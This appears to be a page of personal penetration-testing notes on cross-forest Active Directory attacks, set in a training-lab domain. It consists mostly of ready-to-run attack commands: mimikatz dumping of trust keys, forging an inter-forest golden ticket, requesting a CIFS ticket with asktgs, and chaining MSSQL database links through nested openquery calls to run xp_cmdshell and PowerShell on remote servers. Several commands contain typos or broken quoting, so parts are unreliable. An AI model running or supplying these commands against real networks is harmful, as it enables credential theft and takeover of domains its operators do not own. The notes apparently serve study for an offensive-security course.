🔴Cross Forest Attacks

Privesc across Forest using Trust tickets

we need trust key for that

invoke-mimikatz -command '"lsadump::trust /patch"'

invoke-mimikatz -command '"lsadump::lsa /patch"'

Forging inter-forest TGT

invoke-mimikatz -command '"kerboros::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:SID-of-current-domain /rc4:key-value /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\kekeo_old\trust-tkt.kirbi"'

klist purge

asking TGS

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.eurocorp.local

MYSQL Server Trust Abuse

in order to abuse MYSQL server we need to absue database links

DataBaseLinks

it allows SQL server to access external data sources like other SQL servers and etc..

Because of which we can execute commands

to do this we can either use powershell commands or manually (SQL commands)

database links works even across forest trust

Finding SQL instances

get-SQLinstancedomain

check accessibility

get-SQLconnectiontestthreaded

get-SQLinstancedomain | get-SQLconnectiontestthreaded -verbose

gather information

get-SQLinstancedomain | getSQLserverinfo -verbose

search database links

get-sqlserverlink -instance dcorp-mssql -verbose

select * from master..sysservers

Enumerating Database links

get-sqlserverlinkcrawl -instance dcorp-mssql -verbose

select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgtm",select * from master..sysservers")')

select * from openquery("dcorp-sql1",'select * from master..sysservers')

after enumeration time to execute command

get-sqlserverlink -instance dcorp-mssql -query "exec master..xp_cmdshell 'whoami'"

select * from openquery("dcorp-sql1",'select * from openquery("dcorp-mgtm",select * from openquery("eu-sql",""select @@version as version;exec master..xpcmdshell" powershell whoami)"")")')

PreviousDomain PrivEsc

Last updated 1 year ago

hashtagPrivesc across Forest using Trust tickets

hashtagMYSQL Server Trust Abuse

Privesc across Forest using Trust tickets

MYSQL Server Trust Abuse